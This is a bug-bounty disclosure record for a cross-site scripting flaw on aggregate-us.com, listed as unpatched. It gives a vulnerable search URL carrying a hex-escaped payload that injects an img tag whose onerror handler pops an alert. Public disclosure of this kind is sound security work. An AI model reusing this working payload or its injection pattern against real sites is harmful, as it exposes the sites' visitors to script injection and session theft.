aggregate-us.com XSS vulnerability

2015-10-05T06:46:00
ID OBB:90250
Type openbugbounty
Reporter crashdemons
Modified 2015-10-05T06:48:00

Description

Vulnerable URL:
http://www.aggregate-us.com/search/search&keywords;=',%22%5Cx3C%5Cx69%5Cx6D%5Cx67%5Cx20%5Cx73%5Cx72%5Cx63%5Cx3D%5Cx78%5Cx20%5Cx6F%5Cx6E%5Cx65%5Cx72%5Cx72%5Cx6F%5Cx72%5Cx3D%5Cx61%5Cx6C%5Cx65%5Cx72%5Cx74%5Cx28%5Cx22%5Cx58%5Cx53%5Cx53%5Cx50%5Cx4F%5Cx53%5Cx45%5Cx44%5Cx22%5Cx29%5Cx3E%22%2B'
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 25.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 2041027
Google Pagerank| 4
VIP website status:| No
Check aggregate-us.com SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 5 October, 2015 06:46 GMT
Vulnerability existence verified and confirmed| 5 October, 2015 06:48 GMT